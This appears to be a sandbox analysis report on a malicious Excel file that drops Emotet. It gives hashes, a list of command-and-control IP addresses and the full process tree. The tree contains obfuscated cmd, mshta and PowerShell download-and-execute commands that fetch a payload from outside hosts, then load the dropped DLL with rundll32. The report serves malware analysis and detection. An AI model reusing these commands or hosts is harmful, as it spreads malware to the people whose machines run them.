Analysis

  • max time kernel
    119s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 10:37

General

  • Target

    a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72.xls

  • Size

    142KB

  • MD5

    93de92f3e2868b196ea53446264d69e9

  • SHA1

    5a222d7fc81852ec5fb1ca0abca5fb7810e97299

  • SHA256

    a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72

  • SHA512

    e0e3a2ca736ff74a5d756867a8c0418415a0f74fbb134ff09da468fe20a11c105ad9a230b8b05b9b3b45967f5afaedf1243f1f451c078bdc96d04adca7cc994e

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a1d4e9c497ec94e9c1182741b7096c47396c0057014747c17e618e82538eae72.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3844
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1560
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:876
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:360
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:60
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Crvoqfc\aofyzkfubptguq.mtv",WlePrSKpdwagKC
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4040
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Crvoqfc\aofyzkfubptguq.mtv",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1684
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2088 -s 1660
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2736

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • memory/60-552-0x0000000004820000-0x0000000004846000-memory.dmp
      Filesize

      152KB

    • memory/60-563-0x0000000004740000-0x0000000004766000-memory.dmp
      Filesize

      152KB

    • memory/60-561-0x0000000004970000-0x0000000004996000-memory.dmp
      Filesize

      152KB

    • memory/60-550-0x00000000047C0000-0x00000000047E6000-memory.dmp
      Filesize

      152KB

    • memory/60-548-0x0000000004660000-0x0000000004686000-memory.dmp
      Filesize

      152KB

    • memory/60-545-0x00000000040E0000-0x0000000004106000-memory.dmp
      Filesize

      152KB

    • memory/60-543-0x0000000000080000-0x00000000000A6000-memory.dmp
      Filesize

      152KB

    • memory/360-540-0x00000000031E0000-0x0000000003206000-memory.dmp
      Filesize

      152KB

    • memory/1684-566-0x0000000004D90000-0x0000000004DB6000-memory.dmp
      Filesize

      152KB

    • memory/2716-118-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-130-0x00007FFB6A440000-0x00007FFB6A450000-memory.dmp
      Filesize

      64KB

    • memory/2716-119-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-599-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-121-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-598-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-597-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-596-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-120-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-117-0x00007FFB6CF90000-0x00007FFB6CFA0000-memory.dmp
      Filesize

      64KB

    • memory/2716-131-0x00007FFB6A440000-0x00007FFB6A450000-memory.dmp
      Filesize

      64KB

    • memory/3824-486-0x00000252DA010000-0x00000252DA032000-memory.dmp
      Filesize

      136KB

    • memory/3824-505-0x00000252DA400000-0x00000252DA43C000-memory.dmp
      Filesize

      240KB

    • memory/3824-516-0x00000252DA4C0000-0x00000252DA536000-memory.dmp
      Filesize

      472KB

    • memory/3824-531-0x00000252C1E00000-0x00000252D9FE0000-memory.dmp
      Filesize

      385.9MB

    • memory/3824-536-0x00000252C1E00000-0x00000252D9FE0000-memory.dmp
      Filesize

      385.9MB

    • memory/3824-537-0x00000252C1E00000-0x00000252D9FE0000-memory.dmp
      Filesize

      385.9MB

    • memory/4040-564-0x00000000044C0000-0x00000000044E6000-memory.dmp
      Filesize

      152KB